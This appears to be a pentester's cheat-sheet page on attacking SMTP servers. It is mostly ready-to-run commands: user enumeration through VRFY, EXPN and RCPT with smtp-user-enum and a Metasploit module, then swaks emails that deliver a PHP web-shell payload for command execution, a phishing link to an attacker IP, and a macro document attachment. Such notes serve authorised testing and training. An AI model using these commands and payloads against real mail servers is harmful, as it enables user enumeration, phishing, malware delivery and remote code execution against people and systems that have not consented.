25 - Pentesting smtp
SMTP stands for "Simple Mail Transfer Protocol". It is a protocol used for sending email messages between servers. Most email systems that send mail over the Internet use SMTP to send messages from one server to another, and to deliver messages to local mail clients like Microsoft Outlook or Apple Mail. SMTP servers listen for incoming mail, and then use other protocols to deliver the message to the recipient's mailbox.
nmap
telnet - (user enumeration)
netcat - (user enumeration)
smtp-user-enum - (user enumeration)
smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
metasploit - (user enumeration)
use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 10.10.200.211
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /tmp/users.txt
msf auxiliary(smtp_enum) > run
validate smtp configuration
send email / executing command
send email
swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart <?php system($_REQUEST["cmd"]); ?> BodyEnd' --server $IP
send email
swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart <a href="http://192.168.45.206">click me</a> BodyEnd' --server $IP
send email
swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart File for you BodyEnd' --attach mymacro.doc --server $IP
execute